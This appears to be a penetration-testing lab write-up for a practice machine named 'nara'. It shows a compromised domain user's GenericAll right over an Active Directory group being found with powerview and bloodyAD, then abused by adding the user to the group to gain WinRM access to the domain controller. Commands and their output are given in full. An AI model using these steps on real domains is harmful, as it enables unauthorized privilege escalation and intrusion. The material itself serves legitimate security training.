GenericAll
/Practice/nara/3-Exploitation/attachments/{FD4B8D8D-D172-4FB4-B9FC-E48EF52FA6AC}.png)
During the BloodHound enumeration, it has been identified that the compromised traacy.white user has GenericAll privilege over the Remote Access group, which is part of the Remote Management Users group that allows WinRM access to the DC host; nara.nara-security.com(192.168.209.30)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache powerview NARA-SECURITY.COM/@nara.nara-security.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -SecurityIdentifier tracy.white'
Logging directory is set to /home/kali/.powerview/logs/nara-security-nara.nara-security.com
[2025-07-01 16:31:38] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-07-01 16:31:39] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=Remote Access,OU=remote,DC=nara-security,DC=com
ObjectSID : S-1-5-21-914744703-3800712539-3320214069-1115
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : None
InheritanceType : None
SecurityIdentifier : NARA-SECURITY\Tracy.White
ObjectDN : OU=remote,DC=nara-security,DC=com
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : None
InheritanceType : None
SecurityIdentifier : NARA-SECURITY\Tracy.White
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache bloodyAD -d NARA-SECURITY.COM -k --host nara.nara-security.com --dc-ip $IP get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nara-security,DC=com
permission: WRITE
distinguishedName: CN=Tracy White,OU=staff,DC=nara-security,DC=com
permission: WRITE
distinguishedName: OU=remote,DC=nara-security,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Remote Access,OU=remote,DC=nara-security,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITEThis can be verified using powerview and bloodyAD.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache powerview NARA-SECURITY.COM/@nara.nara-security.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Add-DomainGroupMember -Identity "Remote Access" -Members tracy.white'
Logging directory is set to /home/kali/.powerview/logs/nara-security-nara.nara-security.com
[2025-07-01 16:35:24] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-07-01 16:35:24] User tracy.white successfully added to Remote Access
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache bloodyAD -d NARA-SECURITY.COM -k --host nara.nara-security.com --dc-ip $IP add groupMember 'Remote Access' 'tracy.white'
[+] tracy.white added to Remote Accesspowerview and bloodyAD can be used to add the compromised tracy.white user to the Remote Access group.
Now that the compromised tracy.white user has a transitive group membership to the Remote Management Users group, direct WinRM access to the nara.nara-security.com(192.168.209.30) host is possible.